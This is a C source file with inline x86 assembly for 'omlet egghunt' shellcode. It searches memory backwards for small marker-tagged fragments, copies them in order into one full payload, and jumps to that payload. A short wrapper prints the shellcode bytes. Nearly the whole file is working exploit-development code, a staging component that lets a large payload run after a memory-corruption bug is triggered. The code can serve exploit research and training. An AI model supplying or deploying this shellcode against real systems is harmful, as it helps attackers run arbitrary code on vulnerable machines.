/*
    Omlet Egghunt shellcode.

    Rebuilds a large shellcode from smaller parts and executes it. Useful if
    you cannot get a large shellcode in memory but are able to put a number of
    smaller parts in in memory. It will search these smaller parts (eggs) and
    concatinate them to rebuild the origional shellcode (omlet). Once rebuild,
    it jumps to the start of the shellcode.

    Each egg starts with a 4 byte marker that is searched for by the egghunt
    code. It is followed by a byte containing the egg's length-1 or 0xFF to
    signal that there are no more eggs. If the length != 0xFF it is followed by
    the part of the shellcode contained in the egg.

    The egghunter pops the start address for the hunt of the stack so you need
    to place it there before the egghunt starts. It builds the omlet at this
    address too; be aware that this might cause exceptions or overwrite data!
    It hunts downwards (decreasing the search address) for eggs, which need to
    be found in the same order as they need to be concatenated to rebuild the
    origional shellcode.

*/
int main(void) {
    __asm__(
        // This code will write the actual shellcode to stdout when the program
        // gets run, it is not part of the shellcode:
        "   mov     $end-start, %edx        \n" // length
        "   mov     $start, %ecx            \n" // source
        "   mov     $0x1, %ebx              \n" // stdout
        "   mov     $0x4, %eax              \n" // write
        "   int     $0x80                   \n"
        "   mov     $0x1, %eax              \n" // exit
        "   int     $0x80                   \n"

        // This is the actuall shellcode:

        "start: \n"
        "   std                             \n" // downwards
        "   push    %esp                    \n" // start address of search
        "   pop     %edi                    \n" // %edi = search address
        "   push    %edi                    \n" // > start of shellcode
        "   push    %edi                    \n"
        "   pop     %esi                    \n" // %esi -> destination of omlet
        "scan_next: \n"
        "   xor     %eax, %eax              \n" //
        "   sub     $-0x76190828, %eax      \n" // neg marker to prevent false possitives

        // Search for an egg (rep scasl would miss unalligned markers):
        "scan_byte: \n"
        "   dec     %ecx                    \n" // 0 -> -1
        "   repne   scasb                   \n" // find a byte that matches
        "   jne     scan_byte               \n" // ecx was zero: continue
        "   dec     %edi                    \n"
        "   scasl                           \n"
        "   jne     scan_byte               \n"

        // Egg found: add it to the shellcode.
        "   xchg    %esi, %edi              \n" // %esi -> egg, %edi -> omlet
        "   lodsb                           \n" // %al = egg length-1 or 0xFF
        "   inc     %al                     \n" // %al = egg length or 0x0
        "   xor     %ecx, %ecx              \n"
        "   mov     %al, %cl                \n" // %ecx = egg length
        "   jcxz    done                    \n" // No more eggs
        "   rep     movsb                   \n" // add egg to omlet
        "   xchg    %esi, %edi              \n" // %esi -> omlet, %edi -> search address
        "   jmp     scan_next               \n" // next egg
        "done: \n"
        "    ret                            \n" // < start of shellcode
        "end: \n"
    );
}
